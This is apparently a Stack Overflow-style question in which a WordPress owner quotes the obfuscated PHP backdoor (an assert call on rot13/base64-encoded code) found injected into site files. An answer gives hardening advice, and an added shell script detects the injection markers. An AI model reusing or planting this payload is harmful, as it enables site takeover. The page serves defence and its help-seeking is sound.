Malicious code on WordPress - I have already cleaned it

Time: 2015-11-30 07:38:17

Tags: php wordpress security

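I have read many related questions on Stack Overflow / Information Security, but I have not found a solution that prevents the code from being added.

I am here to find out how to protect a WordPress site (if there is a way).

I have a few sites running on WordPress. Recently one of them was hacked several times. I found malicious code added to different files in different directories. I don't know whether it is because of file permissions. It is mainly in files named indexfooter.

After reading other answers, I have removed the malicious code from all files, I have not installed any plugins, and I am taking regular backups.

For reference, here is the code that was added to the files: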

//###==###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250MJ50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ5xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl82ZQN5BGxhpaHiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwHjBGRkLzVjAwL3MQp5BQL1BTZkZTLmZ2D4ZJV4Z2Z5Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB2A1pzksp2I0o3O0XPEwZFj0ZvkzLJkmMFx7L3IloS9mMKEipUDbWTZkYQR5BGRmYUElqJHcBlEcLaLtCFNtL3IloS9yrTIwXPEwZFx7L3IloS9woT9mMFtxLmRcB31yoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvx9CGRcrlEcLaLtCFOznJkyK2qyqS9wo250MJ50pltvnUE0pQbiYmLjZQx5BF5lqF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvEwZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGN5ZGSvLwN2AwqxAmx4AwH4LmRjMwZmMQtkLwtmLmxvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7sFOcMvNbnKAmMKDbWTyvqvxcVUftMJAbolNxnJW2BlO9VTyzXTymp2I0XPEsHxIEIHIGISfvpPWqXFNzWvNxK1WSHIISH1EoVaNvKFN9CFNvMQZ1MJDjBGpvXFO7VROup3AypaDbWS9FEISIEIAHJlWwVy0cBlO9sD=="));'));
//###==###  

Sometimes the code looks like this:


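Is there any security plugin or anything else that prevents this code from being added?

Thank you very much for your help.

1 Answer:

Answer 0: (score: 2)

You have to do WordPress hardening for more security. The hardening steps prohibit adding content to any file and disable write permission on all files.

For details on WordPress hardening, visit the following links:
1) http://codex.wordpress.org/Hardening_WordPress
2) http://www.firedaemon.com/blog/wordpress-hardening-guide

There is a plugin that follows all the hardening steps and adds disabling or prohibiting of write permission in the .htaccess file.

Plugin name: All In One WP Security & Firewall
Plugin link: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/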
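
An added example, not part of the original answer: a shell audit that lists PHP files carrying the traits visible in the question's first sample (the `//###==###` marker and an `@$var(str_rot13(` call) and lists files or directories writable by group or other, then removes that write bit in line with the hardening advice above. The function names and the path in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example: triage a WordPress tree for the injection traits quoted in the
# question and for write permissions the hardening advice says to remove.
# Function names and the example path are assumptions, not from the page.

# List PHP files containing either trait from the question's first sample:
#   - the //###==### marker that brackets the injected block
#   - a suppressed variable-function call wrapping str_rot13( ... )
scan_injected() {
  find "$1" -type f -name '*.php' -exec grep -lE \
    -e '//###==###' \
    -e '@\$[A-Za-z_0-9]+\(str_rot13\(' \
    {} + 2>/dev/null | sort
}

# List files and directories that group or other may write to.
scan_writable() {
  find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) \
    2>/dev/null | sort
}

# Remove group/other write permission across the tree.
harden_perms() {
  find "$1" \( -type f -o -type d \) -exec chmod go-w {} +
}

# Usage: sh wp_audit.sh /path/to/wordpress   (path is a placeholder)
if [ -n "${1:-}" ]; then
  echo "== files with injected-code traits =="
  scan_injected "$1"
  echo "== group/other-writable paths =="
  scan_writable "$1"
fi
```

Matches from `scan_injected` are candidates for manual review, not proof of compromise. Removing group/other write does not stop modification when PHP runs as the account that owns the files; in that case the owner's write bit or the file ownership has to change as well.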